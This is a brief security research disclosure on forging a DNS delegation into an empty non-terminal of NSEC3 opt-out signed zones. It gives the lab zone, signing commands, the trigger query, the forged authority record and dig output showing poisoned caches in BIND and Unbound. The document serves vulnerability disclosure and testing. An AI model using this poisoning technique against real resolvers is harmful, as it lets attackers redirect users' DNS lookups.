Forged Delegation Injection into Empty Non-Terminal with NSEC3

Tsunehiko Suzuki, 2018/01/12

Abstract

NSEC3 is broken ... (especially dnssec-signzone)

1. Target Zone

  ; RFC 5155 Appendix A. Example Zone and optional records for ENT
  example.           IN SOA ns1.example. bugs.x.w.example. 1 3600 300 3600000 3600
  example.           IN NS  ns1.example.
  ns1.example.       IN A   192.168.11.1
  example.           IN MX  1 xx.example.
  ; for making empty non-terminal "gov.example"
  ex.gov.example.    IN NS  ns.ex.gov.example.
  ns.ex.gov.example. IN A   192.168.11.21
with opt-out NSEC3 sign
# dnssec-signzone -P -A -H 12 -3 aabbccdd ...
# ldns-signzone -n -p -t 12 -s aabbccdd ...

2. Attack

Trigger Query

<random>.gov.example. IN A

Forged Response

Flag: AA=0
Authority Section: gov.example. IN NS ns.poison.nom. ; (forged delegation)

3. Result

BIND + ldns-signzoneBIND + dnssec-signzoneNSD + ldns-signzoneNSD + dnssec-signzone
BIND + nxdomain.ENTNXDOMAINNXDOMAINNXDOMAINSERVFAIL *1
(NXDOMAIN with -o CD)
BIND + NS_of_ENTNODATANODATANODATANODATA
BIND + attackSERVFAIL *2
(poisoned with +cd)
POISONEDSERVFAIL *2
(poisoned with +cd)
SERVFAIL *2
(poisoned with +cd)
Unbound + nxdomain.ENTNXDOMAINNXDOMAINNXDOMAINSERVFAIL *1
(NXDOMAIN with -o CD)
Unbound + NS_of_ENTNODATANODATANODATANODATA
Unbound + attackN/APOISONEDN/AN/A

nxdomain.ENT = `dig -t a foobar.gov.example.`
NS_of_ENT = `dig -t ns gov.example.`

*1 : Inspite of the presentation at OARC25, NSD looks like being broken. You can try SERVFAIL with 'NSD + ENT + opt-out + dnssec-signzone' by `dig foobar.gov.mufj.jp @8.8.8.8 +nocd +dnssec`. ("Gov.mufj.jp" is ENT. There is insecure "sub.gov.mufj.jp" zone.)

*2 : After attack, poisoned cache can be seen with `dig +cd`.

POISONED result

# dig a ns.ex.gov.example 

; <<>> DiG 9.11.2 <<>> a ns.ex.gov.example
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 64666
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
; COOKIE: ca9abd03a0e3723cb190f4255a51f34843c7d1f72b3ed00d (good)
;; QUESTION SECTION:
;ns.ex.gov.example.        IN  A

;; ANSWER SECTION:
ns.ex.gov.example.   1800  IN  A   127.0.0.1

;; AUTHORITY SECTION:
gov.example.        48362  IN  NS  ns.poison.nom.

;; Query time: 0 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: Sun Jan 07 19:15:36 JST 2018
;; MSG SIZE  rcvd: 119

Conclusion

... NSEC3 is broken ... (especially dnssec-signzone)

Is the NSEC3 proofing what?

Environment

Content ServerBIND 9.11.2NSD 4.1.12
Cache ServerBIND 9.11.2Unbound 1.5.10
sign tooldnssec-signzone 9.11.2ldns-signzone 1.6.17

References


Tsunehiko Suzuki / Chukyo University / tss at e-ontap.com / 2018.1.7